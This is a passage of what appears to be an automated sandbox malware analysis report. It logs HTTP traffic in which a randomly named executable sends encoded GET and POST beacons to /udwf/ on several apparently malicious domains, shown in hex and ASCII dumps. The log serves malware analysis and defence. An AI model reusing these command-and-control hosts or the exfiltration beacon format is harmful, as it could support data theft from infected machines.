                                                                                                                            Nov 10, 2023 09:27:53.617347002 CET103INData Raw: 64 37 56 6a 68 45 56 76 6f 41 52 74 6d 77 78 56 63 6e 48 4e 6f 25 32 42 43 35 6b 33 6f 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b
                                                                                                                            Data Ascii: d7VjhEVvoARtmwxVcnHNo%2BC5k3ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=75.999975Server: cloudflareCF-RAY: 823ceb3b2e4808ff-SEA
                                                                                                                            Nov 10, 2023 09:27:53.617383957 CET103INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            40192.168.2.1049755168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:08.715059042 CET311OUTGET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:30:09.068584919 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:07 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            41192.168.2.10497568.212.101.23380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:15.396548986 CET313OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.iwhrkc.shop
                                                                                                                            Referer: http://www.iwhrkc.shop/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6a 59 2b 2f 45 63 64 4e 55 38 4d 67 54 6f 68 74 64 6a 77 51 79 4b 69 57 71 77 2b 43 2b 6c 4f 54 6e 41 6b 74 43 4b 33 49 41 77 72 68 57 6a 49 6f 48 37 62 34 2f 49 43 73 31 5a 53 43 75 42 37 78 74 4b 44 35 6e 44 31 62 42 37 36 36 36 51 73 72 38 62 79 77 4e 45 58 59 43 53 43 34 76 37 5a 4d 36 53 6a 31 4c 44 6d 32 2f 73 59 61 2f 72 72 33 67 66 39 30 4b 54 35 46 37 70 75 56 31 71 50 38 69 58 69 6b 45 61 48 6e 52 2f 49 33 30 38 52 6f 50 65 72 77 56 33 71 4c 4b 47 41 54 65 59 57 33 44 63 71 6c 4d 45 68 77 38 54 73 6b 72 4e 36 65 68 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=jY+/EcdNU8MgTohtdjwQyKiWqw+C+lOTnAktCK3IAwrhWjIoH7b4/ICs1ZSCuB7xtKD5nD1bB7666Qsr8bywNEXYCSC4v7ZM6Sj1LDm2/sYa/rr3gf90KT5F7puV1qP8iXikEaHnR/I308RoPerwV3qLKGATeYW3DcqlMEhw8TskrN6ehA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            42192.168.2.10497588.212.101.23380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:20.766788006 CET315OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.iwhrkc.shop
                                                                                                                            Referer: http://www.iwhrkc.shop/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6a 59 2b 2f 45 63 64 4e 55 38 4d 67 54 49 52 74 65 45 45 51 36 4b 69 56 32 67 2b 43 6b 56 4f 66 6e 41 6f 74 43 4c 43 56 41 47 62 68 57 77 77 6f 45 64 48 34 39 49 43 73 69 4a 53 47 68 68 36 36 74 4b 58 50 6e 42 38 6d 42 2b 69 36 36 33 77 72 73 6f 61 76 43 55 58 57 50 79 43 37 76 37 5a 5a 36 53 7a 4c 4c 44 7a 62 2f 73 41 61 2f 59 44 33 33 2f 39 31 57 44 35 46 37 70 75 5a 31 71 4f 66 69 57 4b 38 45 65 4b 36 52 4e 51 33 33 64 64 6f 4e 2f 72 7a 5a 6e 71 50 46 57 42 44 4e 49 2b 34 4e 65 4f 62 64 55 64 79 6e 47 39 33 6b 5a 2f 73 31 65 6f 33 61 52 6c 4a 73 6f 48 64 4d 58 5a 47 56 73 30 4c 5a 55 31 70 71 48 6e 6e 62 61 35 56 39 35 73 65 59 48 68 59 2b 74 4d 62 4e 4e 64 38 6d 6a 34 46 6b 75 6b 38 4c 77 42 4c 34 78 6a 78 33 6a 4b 33 78 59 52 63 69 36 4d 30 69 45 57 4e 77 78 6d 31 58 55 69 71 46 6f 34 32 72 77 6e 7a 39 6d 4c 39 43 50 4c 49 46 69 45 79 52 43 32 46 51 37 69 61 54 54 41 4c 4c 34 46 68 77 58 4e 64 79 6d 46 36 37 59 63 78 64 32 49 69 56 53 51 56 58 48 2b 6f 52 6f 2b 44 4c 57 6c 6d 6e 6b 52 61 2f 2f 7a 39 2b 39 31 79 55 5a 6d 31 43 4e 53 7a 6d 49 76 48 68 4c 30 53 36 54 6b 2b 66 4b 78 5a 31 36 38 6e 69 65 47 50 36 69 35 39 5a 52 62 7a 44 4d 37 33 36 59 52 39 48 74 64 6d 71 45 76 41 79 78 77 43 69 5a 57 57 59 36 6a 67 65 67 6a 48 48 79 6e 2b 51 33 64 6c 75 4e 58 52 68 5a 47 2f 4d 51 4d 36 53 45 56 2f 47 65 65 79 76 75 39 79 38 77 51 53 52 7a 71 6a 4b 42 68 62 62 38 57 7a 30 4f 33 4b 4e 75 2f 4b 46 70 70 58 35 63 42 4a 48 6f 65 4e 61 74 77 6d 33 65 55 4f 4d 51 30 7a 4f 39 78 45 39 61 70 43 4a 4d 6d 4b 61 38 4d 64 53 76 72 58 72 76 38 63 61 35 59 59 33 38 59 79 33 64 47 43 63 66 48 68 57 7a 6d 51 46 30 6a 6e 66 59 49 6b 6c 74 42 50 6d 65 36 49 72 61 6c 65 32 72 43 4f 65 45 7a 47 73 33 71 69 52 59 32 41 7a 79 35 74 4f 63 6c 79 6f 46 42 58 36 53 74 76 56 62 4f 34 55 49 77 75 6f 68 63 4a 68 6a 35 69 32 67 75 4b 51 49 51 76 73 34 64 35 59 6a 37 59 62 69 55 76 41 37 6a 41 32 59 6f 75 6e 47 53 73 45 33 34 57 45 58 73 6e 49 62 76 71 57 34 67 4d 30 51 39 41 70 4d 39 75 36 64 30 79 77 49 58 68 68 47 74 71 76 30 66 4d 77 72 55 66 73 56 71 56 70 42 32 72 68 75 6c 4a 61 62 37 50 64 36 45 48 54 43 66 4b 62 72 44 65 45 31 4e 66 35 43 38 43 54 4a 53 75 44 62 6e 6a 5a 37 6c 2f 72 37 6e 2b 59 64 76 2b 4d 4b 39 71 79 36 38 6d 6b 64 68 33 44 4d 58 76 71 30 54 47 4e 34 4c 4d 46 6c 6a 36 56 75 44 55 70 2f 67 70 67 6b 61 61 6f 55 74 71 64 67 5a 32 56 71 5a 32 35 51 43 66 53 4c 66 52 2b 35 4a 43 6f 2f 57 75 52 65 50 74 58 5a 38 36 5a 6c 34 6a 33 48 62 53 43 6f 33 46 42 43 36 58 6e 71 6a 76 44 50 4f 59 44 65 61 39 57 32 59 72 36 54 6c 44 44 31 68 44 44 47 66 48 79 37 4a 31 6c 31 2f 30 69 4d 7a 77 33 32 39 76 50 46 38 77 32 61 74 50 45 6a 36 79 67 44 6d 68 79 35 2f 4d 62 2b 74 43 31 56 64 38 35 57 6e 7a 30 2b 6f 4b 2f 4e 4a 70 2f 42 37 54 68 4e 31 7a 51 33 6a 42 33 55 59 43 71 71 34 64 70 43 2f 6d 33 48 6b 56 43 47 4f 6f 72 2b 71 35 6f 61 63 55 4f 57 75 63 78 71 2f 45 50 6d 74 6d 6a 57 56 4f 44 73 52 79 74 5a 49 71 53 56 58 66 64 4e 76 32 4c 36 2f 66 6a 6e 56 38 35 2f 65 76 4f 4a 35 58 7a 32 74 73 35 52 36 72 68 48 6d 66 32 72 50 58 6d 4c 70 79 66 58 7a 75 50 55 41 2f 74 76 46 75 46 51 54 47 78 50 6a 32 48 31 66 56 34 46 54 41 51 4d 36 4d 63 56 72 57 36 38 33 75 63 64 4c 4a 32 51 4a 78 77 66 74 66 4e 55 78 6e 42 6f 79 6a 53 6a 6a 55 7a 75 53 4e 6d 37 6d 51 63 63 4b 53 6b 63 44 76 58 77 6f 6e 7a 65 68 6e 32 54 61 6e 4d 53 70 6a 36 44 6e 58 48 4f 68 76 4d 72 56 36 4d 78 6f 78 2f 4a 52 53 50 53 61 6d 58 41 55 35 39 59 53 42 68 53 4b 4a 78 61 6c 6a 71 67 44 71 44 54 6f 6b 50 35 50 6b 35 32 57 47 36 47 70 6c 35 4a 72 4a 2b 78 38 58 48 57 57 4c 45 65 2f 69 58 70 59 61 70 30 43 79 65 6a 56 6c 71 41 49 62
                                                                                                                            Data Ascii: G0Yxd2Q=jY+/EcdNU8MgTIRteEEQ6KiV2g+CkVOfnAotCLCVAGbhWwwoEdH49ICsiJSGhh66tKXPnB8mB+i663wrsoavCUXWPyC7v7ZZ6SzLLDzb/sAa/YD33/91WD5F7puZ1qOfiWK8EeK6RNQ33ddoN/rzZnqPFWBDNI+4NeObdUdynG93kZ/s1eo3aRlJsoHdMXZGVs0LZU1pqHnnba5V95seYHhY+tMbNNd8mj4Fkuk8LwBL4xjx3jK3xYRci6M0iEWNwxm1XUiqFo42rwnz9mL9CPLIFiEyRC2FQ7iaTTALL4FhwXNdymF67Ycxd2IiVSQVXH+oRo+DLWlmnkRa//z9+91yUZm1CNSzmIvHhL0S6Tk+fKxZ168nieGP6i59ZRbzDM736YR9HtdmqEvAyxwCiZWWY6jgegjHHyn+Q3dluNXRhZG/MQM6SEV/Geeyvu9y8wQSRzqjKBhbb8Wz0O3KNu/KFppX5cBJHoeNatwm3eUOMQ0zO9xE9apCJMmKa8MdSvrXrv8ca5YY38Yy3dGCcfHhWzmQF0jnfYIkltBPme6Irale2rCOeEzGs3qiRY2Azy5tOclyoFBX6StvVbO4UIwuohcJhj5i2guKQIQvs4d5Yj7YbiUvA7jA2YounGSsE34WEXsnIbvqW4gM0Q9ApM9u6d0ywIXhhGtqv0fMwrUfsVqVpB2rhulJab7Pd6EHTCfKbrDeE1Nf5C8CTJSuDbnjZ7l/r7n+Ydv+MK9qy68mkdh3DMXvq0TGN4LMFlj6VuDUp/gpgkaaoUtqdgZ2VqZ25QCfSLfR+5JCo/WuRePtXZ86Zl4j3HbSCo3FBC6XnqjvDPOYDea9W2Yr6TlDD1hDDGfHy7J1l1/0iMzw329vPF8w2atPEj6ygDmhy5/Mb+tC1Vd85Wnz0+oK/NJp/B7ThN1zQ3jB3UYCqq4dpC/m3HkVCGOor+q5oacUOWucxq/EPmtmjWVODsRytZIqSVXfdNv2L6/fjnV85/evOJ5Xz2ts5R6rhHmf2rPXmLpyfXzuPUA/tvFuFQTGxPj2H1fV4FTAQM6McVrW683ucdLJ2QJxwftfNUxnBoyjSjjUzuSNm7mQccKSkcDvXwonzehn2TanMSpj6DnXHOhvMrV6Mxox/JRSPSamXAU59YSBhSKJxaljqgDqDTokP5Pk52WG6Gpl5JrJ+x8XHWWLEe/iXpYap0CyejVlqAIb


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            43192.168.2.10497598.212.101.23380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:23.617130041 CET316OUTGET /udwf/?G0Yxd2Q=uaWfHshIK9gqRIt0eR4Tz5qfjwC0uWvEtBcNKoa2GFPJfFEePrXngeKx3tr3rBy7nKvOiQo6TdyP9ywL+/2JVArzIS+tipxZpg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            44192.168.2.1049760103.120.80.11180C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:30.097944021 CET317OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 4a 69 41 53 62 50 38 48 4e 38 36 52 7a 36 54 4a 63 6c 6d 78 53 37 6e 48 2b 32 52 33 38 4d 2b 4a 62 72 4a 46 35 50 53 59 69 61 65 6d 6e 39 37 6d 2b 75 77 50 57 39 36 2b 2f 64 6f 59 33 73 67 6c 6b 64 6a 69 74 6a 7a 62 4f 2b 62 52 67 64 75 44 30 69 48 4b 74 77 63 78 4d 34 6c 67 70 4b 6f 58 37 49 6b 77 43 52 51 65 49 4d 56 32 4c 68 46 56 62 70 31 63 63 47 78 33 72 30 43 2f 63 4c 55 2b 54 79 63 62 6a 49 6a 43 41 54 59 39 78 75 7a 49 57 64 66 69 65 73 6e 77 73 76 74 4b 62 44 53 76 42 73 68 6f 34 61 49 70 2b 39 49 79 75 57 73 49 66 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=JiASbP8HN86Rz6TJclmxS7nH+2R38M+JbrJF5PSYiaemn97m+uwPW96+/doY3sglkdjitjzbO+bRgduD0iHKtwcxM4lgpKoX7IkwCRQeIMV2LhFVbp1ccGx3r0C/cLU+TycbjIjCATY9xuzIWdfiesnwsvtKbDSvBsho4aIp+9IyuWsIfA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            45192.168.2.1049761103.120.80.11180C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:32.952136040 CET318OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 4a 69 41 53 62 50 38 48 4e 38 36 52 38 37 44 4a 65 45 6d 78 43 72 6e 45 79 57 52 33 33 73 2b 4e 62 72 46 46 35 4b 79 49 69 6f 36 6d 6e 64 4c 6d 2f 71 45 50 56 39 36 2b 33 39 6f 64 7a 73 67 37 6b 64 76 45 74 6d 54 62 4f 2b 66 52 67 63 2b 44 30 54 48 4c 73 67 63 6b 48 59 6c 75 6a 71 6f 58 37 49 6b 77 43 51 30 6b 49 4d 74 32 4d 53 74 56 4a 63 42 44 55 6d 78 30 73 30 43 2f 57 72 55 6c 54 79 64 4f 6a 49 53 66 41 52 51 39 78 76 44 49 57 4f 48 6a 58 73 6e 32 6a 50 73 69 62 78 7a 31 46 65 4a 72 38 76 73 6e 6c 74 6c 53 6d 6a 41 62 59 36 77 6c 71 50 46 74 70 43 59 74 78 45 58 67 61 78 71 42 30 2b 6b 3d
                                                                                                                            Data Ascii: G0Yxd2Q=JiASbP8HN86R87DJeEmxCrnEyWR33s+NbrFF5KyIio6mndLm/qEPV96+39odzsg7kdvEtmTbO+fRgc+D0THLsgckHYlujqoX7IkwCQ0kIMt2MStVJcBDUmx0s0C/WrUlTydOjISfARQ9xvDIWOHjXsn2jPsibxz1FeJr8vsnltlSmjAbY6wlqPFtpCYtxEXgaxqB0+k=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            46192.168.2.1049762103.120.80.11180C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:36.963881016 CET321OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 4a 69 41 53 62 50 38 48 4e 38 36 52 38 37 44 4a 65 45 6d 78 43 72 6e 45 79 57 52 33 33 73 2b 4e 62 72 46 46 35 4b 79 49 69 6f 79 6d 6e 73 72 6d 77 74 59 50 62 64 36 2b 39 64 6f 63 7a 73 68 2b 6b 64 33 49 74 6d 50 78 4f 38 58 52 6d 2b 6d 44 6a 52 2f 4c 6e 67 63 6b 61 49 6c 6a 70 4b 70 50 37 49 30 30 43 51 6b 6b 49 4d 74 32 4d 55 52 56 4c 4a 31 44 53 6d 78 33 72 30 43 7a 63 4c 56 72 54 79 55 35 6a 4d 4f 50 41 43 49 39 78 50 54 49 54 38 66 6a 57 4d 6e 30 67 50 73 36 62 78 2b 72 46 65 45 53 38 72 6b 4e 6c 71 70 53 6c 31 52 38 45 4c 55 52 33 38 64 67 78 6d 63 4f 35 6a 36 48 4f 7a 47 53 77 35 72 42 4c 57 41 7a 2b 4d 75 65 31 69 66 44 42 66 4f 52 5a 50 4f 6e 66 2f 73 32 4b 56 4b 37 52 41 72 66 52 6c 73 58 4d 7a 4a 46 6e 48 67 75 4d 7a 75 79 57 35 51 74 62 72 55 67 74 6f 45 63 4a 72 69 35 69 75 72 77 45 6b 65 41 6a 76 2b 63 51 4e 6b 34 45 53 72 63 58 64 53 64 4b 4d 63 6c 77 2f 4b 5a 4e 7a 4a 47 4b 37 68 54 48 5a 32 62 5a 74 4c 47 61 64 51 39 5a 6e 75 69 71 55 41 37 77 6a 79 4a 50 55 48 39 4a 58 4f 79 70 52 50 4d 71 6e 6e 75 7a 6f 6b 67 63 69 56 71 57 71 4f 66 74 7a 4e 54 53 75 55 58 69 71 65 76 33 76 36 53 75 4d 50 34 33 4c 4d 51 4c 55 33 6d 32 52 39 32 5a 6f 52 6e 76 64 79 72 39 49 56 78 6d 42 55 4b 4a 77 6a 43 61 4f 43 46 75 57 46 31 45 42 55 4c 42 77 68 61 53 4c 6d 64 63 57 6c 48 6a 43 34 69 58 54 74 6e 41 35 64 2b 39 75 53 41 38 67 32 45 47 58 5a 67 67 6a 67 47 48 38 32 6f 74 53 35 66 4a 38 6f 6c 6b 72 34 62 43 2f 63 30 4d 2f 33 30 72 73 63 44 63 37 44 49 78 43 45 49 34 46 38 59 69 49 62 32 50 65 44 69 6f 53 53 66 54 38 46 48 79 4d 53 39 64 47 6c 61 69 79 45 49 2b 66 63 42 53 41 64 44 59 4e 48 64 4e 31 4d 62 57 71 5a 72 76 49 64 32 31 5a 6f 44 44 35 34 6c 61 5a 37 69 52 56 37 6b 2b 5a 30 31 7a 7a 70 6d 49 70 77 69 5a 71 48 53 6e 66 70 49 6d 65 34 41 46 73 51 57 6b 53 54 34 65 39 55 4e 30 72 39 4f 74 4e 56 4e 6d 6f 70 75 6a 48 61 44 5a 46 37 53 50 4c 65 38 72 55 30 45 4c 50 70 64 75 68 49 56 43 6e 35 76 6d 39 73 31 4c 4e 58 73 4f 49 74 6e 2b 6f 7a 6d 61 2b 30 71 5a 74 2f 4d 65 7a 54 66 67 67 4b 64 50 70 55 47 38 39 7a 5a 78 78 52 53 61 77 5a 6e 51 48 4a 50 6f 6f 48 45 48 54 56 37 57 64 4e 55 52 52 51 58 37 4f 70 50 56 50 4f 45 67 69 38 37 54 59 65 4a 39 42 73 75 38 47 62 59 42 48 64 74 49 6b 31 37 55 52 32 50 6a 38 63 31 38 50 78 4a 59 79 37 41 66 69 7a 55 58 55 66 35 61 52 5a 45 56 76 30 6b 34 4d 58 4b 56 47 58 6d 37 68 4b 4e 43 36 71 74 76 5a 5a 78 4a 72 2f 54 75 4d 73 4e 79 6c 34 4f 33 53 76 51 4c 72 36 34 42 4f 77 6e 63 50 51 37 36 36 70 6e 55 63 46 50 30 76 34 4d 79 52 4d 47 61 63 4b 31 62 59 54 6d 2f 32 4c 34 54 6d 72 70 73 4c 2b 48 77 53 51 58 6e 73 38 78 76 36 6d 64 52 31 4d 35 34 4d 6a 41 57 68 6b 55 74 46 7a 58 68 55 78 57 75 4a 72 35 4c 37 37 48 75 4f 56 73 55 6a 52 59 56 5a 59 67 42 79 57 6f 4c 32 72 37 37 6d 66 4c 4c 55 35 4b 59 67 2b 4b 6f 4d 59 48 50 65 71 36 74 74 6b 75 4b 4d 38 70 68 5a 47 4b 7a 37 6d 30 4b 61 35 77 39 77 54 2f 79 37 6e 56 38 30 62 35 56 6d 62 70 59 78 59 4e 56 67 49 37 69 35 68 61 6e 42 41 52 70 6b 4f 72 47 61 6d 70 7a 69 76 54 57 75 64 73 51 42 30 39 69 71 47 4b 57 76 4d 47 70 32 43 7a 53 72 63 57 49 76 47 51 2b 62 4d 30 66 54 67 59 4b 65 59 42 5a 4c 57 72 6f 33 62 5a 35 78 36 31 75 63 58 2f 79 74 44 46 30 4c 38 7a 70 36 54 61 41 43 35 4f 44 43 36 74 7a 4f 63 69 65 65 33 71 42 68 7a 65 64 56 76 38 66 48 72 74 4c 75 6f 6c 43 78 4f 67 7a 76 33 42 4f 4a 4f 79 38 55 56 6e 39 55 77 